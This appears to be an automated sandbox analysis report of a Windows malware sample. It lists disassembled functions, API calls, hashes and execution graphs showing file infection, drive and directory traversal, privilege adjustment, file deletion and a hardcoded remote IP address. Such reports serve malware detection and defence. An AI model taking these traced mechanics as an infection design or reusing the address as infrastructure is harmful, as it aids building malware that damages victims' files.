                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1065093856-0
                                                                                                                • Opcode ID: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                                                • Instruction ID: 0b57e97574c49083c60be4e0953d33bf3402ecf870afa031020ca03fe4ac14e9
                                                                                                                • Opcode Fuzzy Hash: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                                                • Instruction Fuzzy Hash: 36F06234E41348FBEB10DFA49D0AF9E7F785B04705F2081A4F6507B2C1C6B96B008B58
                                                                                                                Function 00401AEE Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 148 401aee-401b29 call 4010dd call 401a63 153 401b2b-401b2d 148->153 154 401b2f-401b4e memcpy call 401000 148->154 156 401b65-401b68 153->156 157 401b53-401b5d 154->157 158 401b63 157->158 159 401b5f-401b61 157->159 158->156 159->156
                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT(-004032A0,119.91.152.151,00000228,?,?,?,?,?,?,0040151F), ref: 00401B42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: 119.91.152.151
                                                                                                                • API String ID: 3510742995-912133076
                                                                                                                • Opcode ID: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                                                • Instruction ID: 35b040e23320f7c57e1bee8842fc800d469dc723e7eedb9ee6c7bb718427654e
                                                                                                                • Opcode Fuzzy Hash: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                                                • Instruction Fuzzy Hash: CDF09671E80304B7EB10AE609D47B6A36685B21745F2040BBF904772D2F67E7725529D
                                                                                                                Function 00402A60 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 160 402a60-402a75 #1576
                                                                                                                APIs
                                                                                                                • #1576.MFC42(00402A06,00402A06,00402A06,00402A06,00402A06,00000000,?,0000000A), ref: 00402A70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1576
                                                                                                                • String ID:
                                                                                                                • API String ID: 1976119259-0
                                                                                                                • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                                                • Instruction ID: 2e8f5fa0b2b7dc8462a5570c84725da21d48d42b60ee068d54710228b117be70
                                                                                                                • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                                                • Instruction Fuzzy Hash: BFB00836118386ABCB12EE95890592ABAA6BB98304F484C1DB2A1500A287668428EB16

                                                                                                                Non-executed Functions

                                                                                                                Function 00402400 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Iconic
                                                                                                                • String ID:
                                                                                                                • API String ID: 110040809-0
                                                                                                                • Opcode ID: 1ee85660d1dedbebd5f403de0e96ef1f5b119a627276ba2acc2b378afb4465c5
                                                                                                                • Instruction ID: 5de610e982ba27cc53666b937cb18e62fe31540b2012b128af7b5849c0221d0a
                                                                                                                • Opcode Fuzzy Hash: 1ee85660d1dedbebd5f403de0e96ef1f5b119a627276ba2acc2b378afb4465c5
                                                                                                                • Instruction Fuzzy Hash: 09C012B090820CAB8708CF98EA00C29BBACEB09301B0002DCF808933008A32AE009A98
                                                                                                                Function 0040187B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 63libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 161 40187b-401970 LoadLibraryA GetProcAddress * 4 GetTickCount wsprintfA 166 401972-401979 FreeLibrary 161->166 167 40197f-401982 161->167 166->167
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040188F
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 004018A7
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 004018BF
                                                                                                                • GetProcAddress.KERNEL32(?,MoveFileA), ref: 004018D7
                                                                                                                • GetProcAddress.KERNEL32(?,MoveFileExA), ref: 004018EF
                                                                                                                • GetTickCount.KERNEL32 ref: 00401921
                                                                                                                • wsprintfA.USER32 ref: 0040193B
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00401979
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$CountFreeLoadTickwsprintf
                                                                                                                • String ID: %s\%d.bak$GetModuleFileNameA$GetSystemDirectoryA$MoveFileA$MoveFileExA$kernel32.dll
                                                                                                                • API String ID: 2704705959-706646508
                                                                                                                • Opcode ID: 439d6103ebf8e8c0a2e54ea9977356cebfa60b531f2e9e129bb2cebecea63de2
                                                                                                                • Instruction ID: 278943a665a34f5de4912a77712433a3c03d867667eba4ba3f010f6a07107de3
                                                                                                                • Opcode Fuzzy Hash: 439d6103ebf8e8c0a2e54ea9977356cebfa60b531f2e9e129bb2cebecea63de2
                                                                                                                • Instruction Fuzzy Hash: B12151B5D85218ABEB20DF60CC8DBE9BB78EB54701F1041E5A649B2191DBB49FC0CF64
                                                                                                                Function 00401C18 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 95libraryloaderstringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 168 401c18-401ce6 memset * 2 LoadLibraryA GetProcAddress * 3 170 401ce8 168->170 171 401cea-401d12 168->171 172 401d2c-401d59 call 401d3a 170->172 171->172 175 401d14-401d25 lstrcpyA 171->175 178 401d68-401d7b 172->178 179 401d5b-401d62 FreeLibrary 172->179 175->172 179->178
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401C59
                                                                                                                • memset.MSVCRT ref: 00401C69
                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                                                • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                                                • GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                                                • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Librarymemset$FreeLoadlstrcpy
                                                                                                                • String ID: ADVAPI32.dll$RegCloseKey$RegOpenKeyExA$RegQueryValueExA
                                                                                                                • API String ID: 3313493744-123098875
                                                                                                                • Opcode ID: 6cfc459c3633b96d3d6a7f6576698e4911ea3d3d1c7daab3c8c40142335194e9
                                                                                                                • Instruction ID: ee5ed84a35279ae09bc0a5aec9c8e8049356c5a81716acae3ba6bb287f67954d
                                                                                                                • Opcode Fuzzy Hash: 6cfc459c3633b96d3d6a7f6576698e4911ea3d3d1c7daab3c8c40142335194e9
                                                                                                                • Instruction Fuzzy Hash: 93314FB5940218ABDB10DF90DD85FDEBBB8AF48710F10416AF605B62D0D778AE44CF64
                                                                                                                Function 004020F5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • #355.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402133
                                                                                                                • #2515.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402145
                                                                                                                • #540.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040217A
                                                                                                                • #2818.MFC42(?,00409D58,?,00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402190
                                                                                                                • #3499.MFC42(?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021C5
                                                                                                                • #6907.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021FB
                                                                                                                • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040220A
                                                                                                                • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402216
                                                                                                                  • Part of subcall function 004022C0: #800.MFC42(?,00000000,00402B79,000000FF,?,0040222D,?,00000001,00000000,?,?,00000000), ref: 004022EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #800$#2515#2818#3499#355#540#6907
                                                                                                                • String ID: All Files (*.*)|*.*||
                                                                                                                • API String ID: 1584807323-1256402831
                                                                                                                • Opcode ID: 4922d2615448acd3483173aa7a39ffc0c03dd6e8f39ba40f8db02418d57e1958
                                                                                                                • Instruction ID: c5d4932d0e26176f48f047347bf5286b918a9edaf58949088f637132c46f74e5
                                                                                                                • Opcode Fuzzy Hash: 4922d2615448acd3483173aa7a39ffc0c03dd6e8f39ba40f8db02418d57e1958
                                                                                                                • Instruction Fuzzy Hash: D0316D7198011CABCB14EB94CE5ABEDB774BB10304F1042AEE115772C1DAB41E44CB69
                                                                                                                Function 004016EB Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 195 4016eb-401720 call 401e60 _access 198 401722-40172c call 401e20 195->198 199 40172e 195->199 198->199 203 401730-401781 #5683 #4129 call 4016eb #800 call 401e60 _mkdir 198->203 201 401784-401791 199->201 203->201
                                                                                                                APIs
                                                                                                                • _access.MSVCRT ref: 00401714
                                                                                                                • #5683.MFC42(0000005C,?,?,?,?,?,?), ref: 00401735
                                                                                                                • #4129.MFC42(?,00000000,0000005C,?,?,?,?,?,?), ref: 00401742
                                                                                                                • #800.MFC42(?,00000000,0000005C,?,?,?,?,?), ref: 0040176D
                                                                                                                • _mkdir.MSVCRT ref: 0040177B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4129#5683#800_access_mkdir
                                                                                                                • String ID:
                                                                                                                • API String ID: 2252135049-0
                                                                                                                • Opcode ID: fe9398ada3c2d6f7717ef24858e2bc8e3691a59763239764df60b612b1b35ab5
                                                                                                                • Instruction ID: e64eea6ac71e0944d3c5090b23e1d4b3a6541fea866ff8cfdbd13ca0f40ae5ed
                                                                                                                • Opcode Fuzzy Hash: fe9398ada3c2d6f7717ef24858e2bc8e3691a59763239764df60b612b1b35ab5
                                                                                                                • Instruction Fuzzy Hash: A71160709001099BCB00EFA5CD45BAEBB79EB00354F10423EF826B72D0DB385A01CB99
                                                                                                                Function 00401FC6 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402400: IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                                                • #470.MFC42(?), ref: 00402004
                                                                                                                  • Part of subcall function 004023D0: SendMessageA.USER32(?,00000000,00000000,00000027), ref: 004023EA
                                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040202A
                                                                                                                • GetSystemMetrics.USER32(0000000C), ref: 00402035
                                                                                                                  • Part of subcall function 00402420: GetClientRect.USER32(?,U @), ref: 00402432
                                                                                                                  • Part of subcall function 004023A0: DrawIcon.USER32(00000000,?,?,?), ref: 004023BA
                                                                                                                • #755.MFC42(?,?,?,?), ref: 004020A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$#470#755ClientDrawIconIconicMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2506822835-0
                                                                                                                • Opcode ID: 1c9899e63e8db84197f4d426d0ee9b49cb4c862dee0a21bfd3b4b5b287d3fdbe
                                                                                                                • Instruction ID: 4f4a8c447454e0b861ef3f698e30a861443d70d21ee0d95d9e798c61fe4189de
                                                                                                                • Opcode Fuzzy Hash: 1c9899e63e8db84197f4d426d0ee9b49cb4c862dee0a21bfd3b4b5b287d3fdbe
                                                                                                                • Instruction Fuzzy Hash: 15212D719001099BCB14EFB4DE4ABEDB774BB08304F14826EE515B32D1DF786904CB58

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:28.9%
                                                                                                                Dynamic/Decrypted Code Coverage:10.4%
                                                                                                                Signature Coverage:23.6%
                                                                                                                Total number of Nodes:297
                                                                                                                Total number of Limit Nodes:10
                                                                                                                execution_graph 1322 3c6158 1323 3c615f VirtualFree 1322->1323 1330 3c60c7 1323->1330 1324 3c6198 VirtualFree 1332 3c61b2 1324->1332 1325 3c60d5 VirtualAlloc 1325->1330 1326 3c6389 VirtualProtect 1329 3c63b7 1326->1329 1327 3c63fc VirtualProtect 1328 3c6400 1327->1328 1329->1327 1331 3c63e7 VirtualProtect 1329->1331 1330->1323 1330->1324 1330->1325 1331->1327 1331->1329 1332->1326 1333 3c62fb 1332->1333 1334 3c6014 1335 3c6035 GetModuleHandleA 1334->1335 1336 3c605f 1334->1336 1337 3c604d GetProcAddress 1335->1337 1338 3c6058 1337->1338 1338->1336 1338->1337 1338->1338 1005 3c6076 1006 3c607b 1005->1006 1010 3c60c7 1005->1010 1008 3c60b0 VirtualAlloc 1006->1008 1006->1010 1013 3c61b2 1006->1013 1007 3c615f VirtualFree 1007->1010 1008->1010 1009 3c6198 VirtualFree 1009->1013 1010->1007 1010->1009 1011 3c60d5 VirtualAlloc 1010->1011 1011->1010 1012 3c6389 VirtualProtect 1015 3c63b7 1012->1015 1013->1012 1018 3c62fb 1013->1018 1014 3c63fc VirtualProtect 1016 3c6400 1014->1016 1015->1014 1015->1015 1017 3c63e7 VirtualProtect 1015->1017 1017->1014 1017->1015 1019 3c14e1 1020 3c14fd GetModuleHandleA 1019->1020 1021 3c1541 1019->1021 1022 3c151a VirtualQuery 1020->1022 1023 3c1512 1020->1023 1024 3c1549 1021->1024 1025 3c1573 1021->1025 1022->1023 1023->1021 1027 3c1566 1024->1027 1047 3c1af9 1024->1047 1030 3c1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1025->1030 1028 3c1579 ExitProcess 1031 3c167f 1030->1031 1032 3c167a 1030->1032 1053 3c1718 GetSystemTimeAsFileTime 1031->1053 1065 3c139f GetVersionExA 1032->1065 1035 3c16ca 1036 3c16d7 1035->1036 1037 3c16d0 1035->1037 1040 3c16dd lstrcpy 1036->1040 1041 3c170f 1036->1041 1086 3c1581 1037->1086 1038 3c1686 1038->1035 1042 3c16a0 CreateThread 1038->1042 1040->1028 1041->1028 1058 3c2c48 memset 1042->1058 1302 3c1099 1042->1302 1046 3c1718 3 API calls 1046->1035 1048 3c1b09 1047->1048 1049 3c1b11 1047->1049 1050 3c1638 188 API calls 1048->1050 1051 3c1b16 CreateThread 1049->1051 1052 3c1b0f 1049->1052 1050->1052 1051->1052 1321 3c1638 189 API calls 1051->1321 1052->1027 1054 3c1754 1053->1054 1055 3c1735 SHSetValueA 1053->1055 1056 3c175a SHGetValueA 1054->1056 1057 3c1786 __aulldiv 1054->1057 1055->1057 1056->1057 1057->1038 1092 3c1973 PathFileExistsA 1058->1092 1061 3c2cb2 1063 3c16ba WaitForSingleObject 1061->1063 1064 3c2cbb VirtualFree 1061->1064 1062 3c2c8f CreateThread WaitForMultipleObjects 1062->1061 1114 3c2b8c memset GetLogicalDriveStringsA 1062->1114 1063->1046 1064->1063 1066 3c13cf LookupPrivilegeValueA 1065->1066 1067 3c14da 1065->1067 1068 3c13e7 1066->1068 1069 3c13ef 1066->1069 1067->1031 1282 3c119f GetCurrentProcess OpenProcessToken 1068->1282 1069->1067 1287 3c120e GetModuleHandleA GetProcAddress 1069->1287 1075 3c1448 GetCurrentProcessId 1075->1067 1076 3c1457 1075->1076 1076->1067 1077 3c1319 3 API calls 1076->1077 1078 3c147f 1077->1078 1079 3c1319 3 API calls 1078->1079 1080 3c148e 1079->1080 1080->1067 1081 3c1319 3 API calls 1080->1081 1082 3c14b4 1081->1082 1083 3c1319 3 API calls 1082->1083 1084 3c14c3 1083->1084 1085 3c1319 3 API calls 1084->1085 1085->1067 1301 3c185b GetSystemTimeAsFileTime srand rand srand rand 1086->1301 1088 3c1592 wsprintfA wsprintfA lstrlen CreateFileA 1089 3c15fb WriteFile CloseHandle 1088->1089 1090 3c1633 1088->1090 1089->1090 1091 3c161d ShellExecuteA 1089->1091 1090->1041 1091->1090 1093 3c19a0 1092->1093 1094 3c1ac7 1092->1094 1095 3c19af CreateFileA 1093->1095 1094->1061 1094->1062 1096 3c1a28 GetFileSize 1095->1096 1097 3c19c4 Sleep 1095->1097 1098 3c1a38 1096->1098 1109 3c1a80 1096->1109 1097->1095 1099 3c19d5 1097->1099 1100 3c1a3d VirtualAlloc 1098->1100 1098->1109 1113 3c185b GetSystemTimeAsFileTime srand rand srand rand 1099->1113 1104 3c1a53 1100->1104 1100->1109 1101 3c1a8d CloseHandle 1102 3c1a96 1101->1102 1105 3c1a9c DeleteFileA 1102->1105 1106 3c1aad 1102->1106 1108 3c1a59 ReadFile 1104->1108 1104->1109 1105->1106 1106->1094 1112 3c1ab8 VirtualFree 1106->1112 1107 3c19da wsprintfA CopyFileA 1107->1096 1111 3c1a0d CreateFileA 1107->1111 1108->1104 1108->1109 1109->1101 1109->1102 1111->1096 1111->1105 1112->1094 1113->1107 1115 3c2bc8 1114->1115 1116 3c2c09 WaitForMultipleObjects 1114->1116 1119 3c2bfa lstrlen 1115->1119 1120 3c2bd2 GetDriveTypeA 1115->1120 1121 3c2be3 CreateThread 1115->1121 1117 3c2c3c 1116->1117 1118 3c2c2a CreateThread 1116->1118 1118->1117 1125 3c2845 1118->1125 1119->1115 1119->1116 1120->1115 1120->1119 1121->1119 1122 3c2b7d 1121->1122 1135 3c29e2 memset wsprintfA 1122->1135 1272 3c274a memset memset SHGetSpecialFolderPathA wsprintfA 1125->1272 1127 3c2878 DeleteFileA 1128 3c288c VirtualFree 1127->1128 1129 3c289a 1127->1129 1128->1129 1130 3c28ab 1129->1130 1131 3c28a4 CloseHandle 1129->1131 1131->1130 1132 3c2692 8 API calls 1133 3c2853 1132->1133 1133->1127 1133->1132 1134 3c239d 186 API calls 1133->1134 1134->1133 1136 3c2abc memset memset FindFirstFileA 1135->1136 1137 3c2a3a memset lstrlen lstrcpyn strrchr 1135->1137 1149 3c28b8 memset wsprintfA 1136->1149 1137->1136 1139 3c2a88 1137->1139 1139->1136 1141 3c2a9a lstrcmpiA 1139->1141 1143 3c2aad lstrlen 1141->1143 1144 3c2b74 1141->1144 1142 3c2b61 FindNextFileA 1145 3c2b6d FindClose 1142->1145 1146 3c2b23 1142->1146 1143->1136 1143->1141 1145->1144 1147 3c2b35 lstrcmpiA 1146->1147 1148 3c28b8 174 API calls 1146->1148 1147->1145 1147->1146 1148->1142 1150 3c2951 memset 1149->1150 1151 3c2905 1149->1151 1150->1142 1151->1150 1152 3c291b memset wsprintfA 1151->1152 1153 3c2956 strrchr 1151->1153 1154 3c29e2 180 API calls 1152->1154 1153->1150 1155 3c2967 lstrcmpiA 1153->1155 1154->1150 1156 3c2988 lstrcmpiA 1155->1156 1157 3c297a 1155->1157 1156->1150 1159 3c2994 1156->1159 1167 3c1e6e 1157->1167 1160 3c29ad strstr 1159->1160 1161 3c29a5 lstrcpy 1159->1161 1162 3c29cb 1160->1162 1163 3c29d3 1160->1163 1161->1160 1210 3c239d strstr 1162->1210 1232 3c2692 1163->1232 1168 3c1e7d 1167->1168 1241 3c1df6 strrchr 1168->1241 1171 3c1eb0 SetFileAttributesA CreateFileA 1172 3c2332 1171->1172 1173 3c1edf 1171->1173 1175 3c233d UnmapViewOfFile 1172->1175 1176 3c2346 1172->1176 1246 3c1915 1173->1246 1175->1176 1178 3c234b CloseHandle 1176->1178 1179 3c2350 1176->1179 1178->1179 1180 3c2356 CloseHandle 1179->1180 1181 3c2391 1179->1181 1180->1181 1181->1150 1182 3c1f2e 1182->1172 1252 3c1c81 1182->1252 1186 3c1f92 1187 3c1c81 2 API calls 1186->1187 1188 3c1f9f 1187->1188 1188->1172 1189 3c1af9 169 API calls 1188->1189 1190 3c2024 1188->1190 1194 3c1fc0 1189->1194 1190->1172 1191 3c1af9 169 API calls 1190->1191 1192 3c207a 1191->1192 1193 3c1af9 169 API calls 1192->1193 1198 3c2090 1193->1198 1194->1172 1194->1190 1195 3c1af9 169 API calls 1194->1195 1196 3c1ffe 1195->1196 1197 3c2013 FlushViewOfFile 1196->1197 1197->1190 1199 3c20bb memset memset 1198->1199 1200 3c20f5 1199->1200 1201 3c1c81 2 API calls 1200->1201 1203 3c21de 1201->1203 1202 3c2226 memcpy UnmapViewOfFile CloseHandle 1257 3c1b8a 1202->1257 1203->1202 1205 3c226e 1265 3c185b GetSystemTimeAsFileTime srand rand srand rand 1205->1265 1207 3c22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1208 3c1915 3 API calls 1207->1208 1209 3c231f CloseHandle 1208->1209 1209->1172 1211 3c2451 CreateFileA GetFileSize 1210->1211 1217 3c23d8 1210->1217 1212 3c2675 CloseHandle 1211->1212 1213 3c2480 1211->1213 1214 3c267c RemoveDirectoryA 1212->1214 1213->1212 1215 3c2499 1213->1215 1216 3c2687 1214->1216 1218 3c1915 3 API calls 1215->1218 1216->1150 1217->1211 1217->1216 1219 3c24a4 9 API calls 1218->1219 1267 3c189d memset CreateProcessA 1219->1267 1222 3c255c Sleep memset wsprintfA 1223 3c29e2 163 API calls 1222->1223 1224 3c2597 memset wsprintfA Sleep 1223->1224 1225 3c189d 6 API calls 1224->1225 1226 3c25e4 Sleep CreateFileA 1225->1226 1227 3c1915 3 API calls 1226->1227 1228 3c2610 CloseHandle 1227->1228 1228->1214 1229 3c261e 1228->1229 1229->1214 1230 3c2641 SetFilePointer WriteFile 1229->1230 1230->1214 1231 3c2667 SetEndOfFile 1230->1231 1231->1214 1233 